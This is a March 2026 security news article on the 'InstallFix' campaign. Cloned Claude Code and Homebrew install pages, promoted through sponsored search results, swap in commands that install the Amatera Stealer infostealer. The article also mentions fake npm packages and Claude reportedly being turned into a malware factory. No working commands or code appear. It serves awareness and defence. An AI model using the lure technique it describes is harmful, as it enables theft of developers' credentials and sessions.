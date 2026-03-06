Security researchers at Push Security have discovered a new technique they call InstallFix. Attackers clone installation pages of developer tools such as Claude Code and replace the install commands with malware instructions. The fake pages are distributed via sponsored Google search results and install the Amatera Stealer on victims’ systems.

The attack method builds on the well-known ClickFix pattern, but has the major advantage that no excuse is needed. The user simply wants to install software, and that is enough. The fake pages are virtually pixel-perfect copies of the official Claude Code installation page, including layout, branding, and documentation sidebar. However, the install commands do not refer to claude.ai but to a server owned by the attacker. Anyone who does not check the URL in the command carefully will not notice any difference. After interacting with the page, visitors are also redirected to the real site, which removes any suspicion.

The fake pages are distributed exclusively via Google Ads, in particular via sponsored search results. Searches such as “Claude Code install” or “Claude Code CLI” lead victims to the malicious pages. Techzine previously reported on a case in which Claude was converted into a malware factory in eight hours, and that more than 40,000 OpenClaw agents were found to be vulnerable.

Amatera Stealer as payload

The malware installed via the fake commands is Amatera Stealer. This infostealer first appeared in 2025 and is considered the successor to ACR Stealer. Amatera steals browser data, cookies, session tokens, and system information. The malware communicates with its command-and-control server via hardcoded IP addresses of legitimate CDNs, which makes detection difficult. The attackers abuse Cloudflare Pages, Squarespace, and Tencent EdgeOne for hosting.

The campaign does not stand alone. In addition to the fake Claude Code pages, the researchers also identified clones of the Homebrew installation page and malicious npm packages that imitate the official Claude Code name. According to Push, four out of five ClickFix lures are distributed via search engines.